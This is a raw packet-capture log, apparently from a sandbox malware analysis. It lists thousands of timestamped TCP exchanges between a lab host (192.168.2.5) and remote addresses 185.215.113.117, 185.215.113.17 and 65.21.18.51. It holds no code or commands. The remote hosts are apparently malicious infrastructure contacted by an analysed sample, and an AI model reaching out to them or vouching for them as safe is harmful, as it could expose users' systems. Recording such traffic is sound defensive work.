                                                                          Sep 27, 2024 04:21:18.010433912 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010457039 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010467052 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010478020 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010478020 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010478020 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010489941 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010510921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010510921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010535002 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010545969 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010556936 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010567904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010611057 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010611057 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.011670113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.011692047 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.011703968 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.011737108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.011743069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.011743069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.011743069 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.011749029 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.011779070 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.011790037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.011800051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.011821985 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.011821985 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.011905909 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.012386084 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.012398005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.012408018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.012427092 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.012438059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.012445927 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.012445927 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.012454033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.012465954 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.012486935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.012486935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.012526989 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.012556076 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.012661934 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.012981892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013021946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013031960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013044119 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013084888 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013097048 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013125896 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013125896 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013181925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013269901 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013307095 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013318062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013328075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013339043 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013339043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013339043 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013353109 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013361931 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013361931 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013371944 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013384104 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013395071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013395071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013395071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013406038 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013417006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013427973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013427973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013514996 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013525963 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013537884 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013550043 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013550043 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013555050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013566017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013577938 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013603926 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013603926 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013652086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013690948 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013690948 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013822079 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013874054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013885021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013896942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.013902903 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013938904 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013938904 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.013946056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.014009953 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.014010906 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.014024019 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.014122963 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.039364100 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.039376974 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.039397001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.039433956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.039446115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.039449930 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.039449930 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.039458990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.039470911 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.039505959 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.039505959 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042289019 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042315960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042329073 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042341948 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042350054 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042350054 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042354107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042367935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042387009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042401075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042401075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042424917 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042437077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042448997 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042457104 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042457104 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042460918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042474031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042485952 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042490005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042500973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042531013 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042531013 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042593002 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042634010 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042637110 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042721033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042764902 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042764902 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042793036 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042805910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042820930 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042831898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042846918 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042846918 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042881012 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042881012 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.042911053 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.042943954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.044482946 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046521902 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046572924 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046602011 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046611071 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046622038 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046637058 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046648026 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046658993 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046659946 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046670914 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046681881 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046706915 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046722889 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046735048 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046746016 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046761990 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046768904 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046773911 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046783924 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046786070 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046797991 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046802998 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046809912 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046833038 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046834946 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046850920 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046860933 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046861887 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046873093 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046884060 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046884060 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046906948 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046906948 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046917915 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046937943 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046945095 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046947956 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046958923 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.046967983 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.046982050 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047003984 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047044992 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047063112 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047075033 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047085047 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047090054 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047099113 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047108889 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047108889 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047147989 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047194004 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047210932 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047221899 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047233105 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047243118 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047245979 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047255039 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047265053 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047266960 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047283888 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047300100 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047307014 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047399044 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047472954 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047483921 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047496080 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047506094 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047508001 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047518015 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047528982 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047530890 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047540903 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047552109 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047563076 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047581911 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047660112 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047710896 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047727108 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047744036 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047753096 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047755957 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047768116 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047775030 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047777891 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047789097 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047805071 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047807932 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047816038 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047826052 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047835112 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047837973 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047848940 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047849894 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047861099 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047871113 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047878981 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047904968 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047914982 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047925949 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047936916 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047947884 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047954082 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047959089 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047969103 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.047981024 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047991991 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.047993898 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.048017025 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.048041105 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.049459934 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.049469948 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.049480915 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.049508095 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.049527884 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.049540997 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.049552917 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.049562931 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.049573898 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.049575090 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.049585104 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.049588919 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.049607038 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.049631119 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.060071945 CEST4971945580192.168.2.565.21.18.51
                                                                          Sep 27, 2024 04:21:18.060585022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.060604095 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.060614109 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.060678959 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.060679913 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.060682058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.060695887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.060705900 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.060719013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.060730934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.060734034 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.060734034 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.060941935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.061903954 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.061964989 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.061974049 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.061984062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.061995029 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.062005997 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.062040091 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.062040091 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.062047005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.062058926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.062082052 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.062082052 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.064810991 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:18.091942072 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.091964960 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.091975927 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.091986895 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.091996908 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092009068 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092016935 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.092045069 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.092056990 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092092037 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.092197895 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092243910 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.092300892 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092312098 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092333078 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092344046 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092348099 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.092355967 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092365980 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092374086 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.092376947 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092386961 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092392921 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.092401028 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092411995 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.092411995 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092422962 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092432976 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.092433929 CEST4972280192.168.2.5185.215.113.17
